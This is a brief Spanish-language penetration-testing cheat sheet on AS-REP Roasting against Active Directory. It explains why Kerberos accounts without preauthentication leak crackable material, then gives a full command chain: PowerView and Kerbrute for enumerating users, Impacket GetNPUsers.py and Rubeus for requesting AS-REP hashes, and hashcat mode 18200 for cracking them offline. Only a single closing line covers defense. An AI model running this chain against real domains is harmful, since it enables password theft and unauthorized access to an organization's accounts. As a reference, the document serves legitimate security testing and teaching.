Qué es
AS-REP Roasting saca material cifrado del KDC de una cuenta que tiene la preautenticación de Kerberos desactivada. El atacante lo descifra fuera de línea y recupera la contraseña en texto plano si es débil.
Cómo funciona
El KDC exige un paso previo: el cliente cifra una marca de tiempo con el hash de su contraseña antes de recibir cualquier ticket. Eso es la preautenticación. Si una cuenta la tiene desactivada, el KDC responde a cualquier AS-REQ sin validar la identidad del que pide. Devuelve un AS-REP con un bloque cifrado con el hash de esa cuenta. El atacante captura ese bloque y lo somete a fuerza bruta o diccionario fuera de línea. No hace falta una credencial del dominio: basta el nombre de usuario y acceso al puerto 88.
Comandos
Enumerar cuentas sin preautenticación con PowerView, desde una sesión ya autenticada:
Get-DomainUser -PreauthNotRequired | Select-Object samaccountnamePedir el AS-REP sin credenciales, con una lista de usuarios:
GetNPUsers.py <DOMAIN>/ -no-pass -usersfile <FILE> -dc-ip <IP> -format hashcat -outputfile <FILE>Con credenciales, enumerar y pedir en un solo paso:
GetNPUsers.py <DOMAIN>/<USER>:<PASSWORD> -dc-ip <IP> -request -format hashcat -outputfile <FILE>Desde un host de dominio en Windows, con Rubeus:
Rubeus.exe asreproast /format:hashcat /nowrap /outfile:<FILE>Validar los nombres de usuario antes del ataque, con Kerbrute:
kerbrute userenum -d <DOMAIN> --dc <IP> <FILE>Descifrar el hash capturado con hashcat:
hashcat -m 18200 <FILE> <WORDLIST>Cómo defenderse
Reactiva la preautenticación de Kerberos en toda cuenta que la tenga desactivada sin una justificación documentada.